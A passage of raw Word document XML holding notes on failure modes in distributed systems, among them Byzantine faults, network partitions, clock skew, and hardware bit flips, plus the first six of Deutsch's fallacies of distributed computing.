        <w:t xml:space="preserve">    GC pause causing JVM to stop for 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D906B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Thread pool exhausted: new requests queue indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE25365" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Network path with severe packet loss: TCP retransmits cause delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA63225" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    CPU thermal throttling: clock speed halved, all operations 2× slower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE70DC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489C8356" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Detection: latency percentile monitoring, not just liveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376744CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Handling: requires timeout + retry to distinguish from fail-stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC715B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397B0AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fail-Byzantine (most severe):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D615EA5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Component produces arbitrary, incorrect output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78C792" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  May produce different incorrect output to different observers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CE788" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  May appear to work correctly in some scenarios and fail in others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B2EC9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5EC1D0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E3EE0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Cosmic ray flipping a bit in computation (hardware fault)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFEE9F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Memory corruption from buffer overflow (software bug)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61C932" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Malicious insider sending incorrect data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B706CAB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Compromised node in a distributed system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73058601" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Silent data corruption from faulty storage controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2C2CF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D284F26" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Detection: requires redundant computation and comparison, cryptographic verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E713760" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Handling: Byzantine Fault Tolerant protocols (f &lt; N/3), checksums everywhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68663E28" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B6E08" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Network failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7568F927" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Partition: nodes cannot communicate with each other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572B3B9C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Complete partition: A cannot reach B at all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AC5FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Partial partition: A can reach B but B cannot reach A (asymmetric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAA271E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB8A2E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Message loss: packets dropped without notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0F035" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ICMP unreachable: router notifies sender of unreachability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196C17DE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Silent drop: packet disappears without trace (more common and harder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC67BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8440BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Message reordering: packets arrive in different order than sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B430EF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    TCP: handles reordering within a connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C602FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    UDP: application must handle reordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D664D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA490E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Message duplication: same packet delivered multiple times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD15097" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    TCP: handles duplication within connection (sequence numbers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D74AB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    At-least-once delivery: application receives duplicates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941865B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC40C6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Corruption: bits flipped in transit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DDE589" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Ethernet/TCP: checksums detect most corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BBB168" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Undetected: ~10^-9 to 10^-12 probability per bit (still non-zero!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1591A758" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD962A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Timing failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D068FC4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Clock skew: different nodes have different wall clock readings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC6291E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    NTP: synchronizes to ~1-10ms accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502458B6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    GPS-disciplined: ~1µs accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C1EC7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Crystal drift: 1-100ppm → 1-100µs per second without correction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E577E8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1935E14A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Clock leap: NTP step adjustment (large sudden change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43109DD6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Applications assuming monotonic time: fail silently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F83FF4B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Use CLOCK_MONOTONIC (not CLOCK_REALTIME) for measuring durations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5D74F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81BD4D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Message delay: arbitrary delay in asynchronous systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05481761" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    FLP impossibility: cannot distinguish slow from crashed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B5A700" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Practical bound: use timeouts (accept false positives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D47EC6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B102840" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Hardware faults:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5138B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Bit rot: storage bits flip over time (especially HDDs, NAND flash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B6B61" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ECC (Error-Correcting Code): detects and corrects single-bit errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC31E56" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    RAID: corrects drive failures (not silent corruption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146FA8A1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Checksums: detect corruption (not correct it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4E4CF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA9524" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Rowhammer: DRAM bit flips from repeated access to adjacent rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C686BE8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Mitigation: ECC RAM, targeted refresh rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00775B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF89E4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  CPU computation errors: rare but non-zero (cosmic rays, voltage fluctuations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189D3A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Probability: ~10^-17 per operation (negligible for most systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88C599" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    High-stakes systems: redundant CPUs, voted output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D112699" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Eight Fallacies of Distributed Computing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66026EE8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Peter Deutsch's eight fallacies represent assumptions that engineers make about distributed systems — each a failure mode when the assumption is violated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0665A462" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FFEE0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fallacy 1: The network is reliable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C17E7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: packets are dropped, routers fail, cables are cut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E5435" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: every network call must handle failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51914427" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Code pattern: retry with backoff, circuit breakers, timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF07046" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0FFAAE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Fallacy 2: Latency is zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310C977" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: datacenter RTT = 0.5-2ms, cross-region = 50-200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160DB56C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: network calls are expensive — design for fewer, larger calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5A5E3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Code pattern: batching, connection pooling, local caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9AB0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77537399" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fallacy 3: Bandwidth is infinite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5786B409" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: network links are physically bounded (1-100 Gbps, shared)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5960F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: sending large payloads degrades latency for all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024AA0A9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Code pattern: compression, pagination, streaming, backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04021365" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAEAC4F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fallacy 4: The network is secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E154062" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: packets can be intercepted, modified, replayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053DD86" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: assume adversarial network for sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C662323" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Code pattern: TLS everywhere, mutual authentication, message signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255EDE2B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DD330" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fallacy 5: Topology doesn't change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1BC1C9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: services move, IPs change, load balancers are added/removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE624B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: hardcoded IPs and ports break; service discovery required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A90FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Code pattern: DNS, service mesh, configuration management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3908F5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2919910C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fallacy 6: There is one administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DE3E5E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: multiple teams own different components; humans make mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B8126" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implication: system must be fault-tolerant to misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66894F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
